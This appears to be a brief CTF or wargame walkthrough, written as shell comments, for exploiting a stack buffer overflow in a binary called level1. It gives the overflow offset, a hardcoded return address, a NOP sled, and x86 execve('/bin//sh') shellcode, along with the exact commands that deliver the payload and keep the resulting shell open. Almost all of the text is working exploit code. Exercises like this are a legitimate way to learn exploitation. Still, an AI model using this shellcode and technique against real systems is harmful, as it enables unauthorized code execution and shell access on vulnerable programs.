# Open the binary with gdb
# Try to find the offset where the return address is overide
# r < <(python -c 'print "A"*80')
# The offset is 80
# Replace the return address by 0xbffff6e0
# Inject the shellcode with nop before and behind and the new return address
# Don't forget to put cat after so you can execute commands
# r < <(python -c 'print "\x90"*20 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90" + "\x90"*28 + "\xe0\xf6\xff\xbf"'; cat)
# Leave gdb
# export the LINES and COLUMNS env
# mkdir /tmp/level1 && python -c 'print "\x90"*20 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90" + "\x90"*28 + "\xe0\xf6\xff\xbf"' > /tmp/level1/bo
# (cat /tmp/level1/bo; cat) | ./level1